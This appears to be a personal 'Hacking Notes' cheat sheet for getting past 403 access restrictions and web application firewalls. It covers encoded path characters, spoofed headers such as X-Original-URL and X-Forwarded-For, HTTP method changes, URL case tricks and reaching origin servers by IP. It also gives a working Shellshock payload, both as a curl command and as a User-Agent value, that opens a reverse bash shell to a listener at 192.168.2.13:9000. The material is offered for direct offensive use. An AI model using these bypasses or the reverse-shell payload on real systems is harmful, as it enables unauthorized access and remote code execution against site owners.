Hacking Notes | Welcome 👋

Appending Encoded Characters:
- Use %2e (.) or %2f (/) after the first slash in the URL to manipulate path traversal.
  - Example URLs:
    - https://www.domain/DB → 403
    - https://www.domain/%2e/DB → 200
    - https://www.domain/./DB → 200

Adding Custom Headers to Requests:
- Include specific headers in your request to bypass restrictions:
  - Content-Length: 0
  - X-rewrite-url
  - X-Original-URL
  - X-Custom-IP-Authorization
  - X-Forwarded-For

Method Alteration:
- Change the HTTP method used in requests:
  - GET → POST
  - GET → TRACE
  - GET → PUT
  - GET → OPTIONS

Curl Command:

Use Curl to send a request with modified headers:

curl -i -s -k -X 'GET' -H 'Host: account.domain.com' -H 'X-rewrite-url: admin/login' 'https://account.domain.com/'

Subdirectory Enumeration:
- Brute force subdirectories from the restricted area:
  - Utilize tools like dirb with a wordlist (e.g., common.txt).
  - Set up a Netcat listener.
  - Inject parameters using Curl or Burp Suite:
    - Curl Example:
      curl -A "() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1" http://192.168.2.18/cgi-bin/helloworld.cgi
    - Burp Suite Example:
      - Change User-Agent:
      () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
  - Further Information: Shellshock Attack (opens in a new tab)

Changing URL Spelling:
- Attempt variations in the URL spelling to evade detection:
  - Examples:
    - ww2.example.com/admin
    - www.example.com/ADMIN
    - www.example.com/aDmin

Accessing via IP Address:
- Bypass WAF by accessing the server directly through its IP address instead of the domain:
  - Use tools like Security Trails (opens in a new tab) for historical IP data.
  - Perform DNS queries to obtain the server's origin IP.
  - Consider firewalls in front of the server.

Modifying Injection Techniques:
- Experiment with different injection formulas to determine if any bypasses the WAF.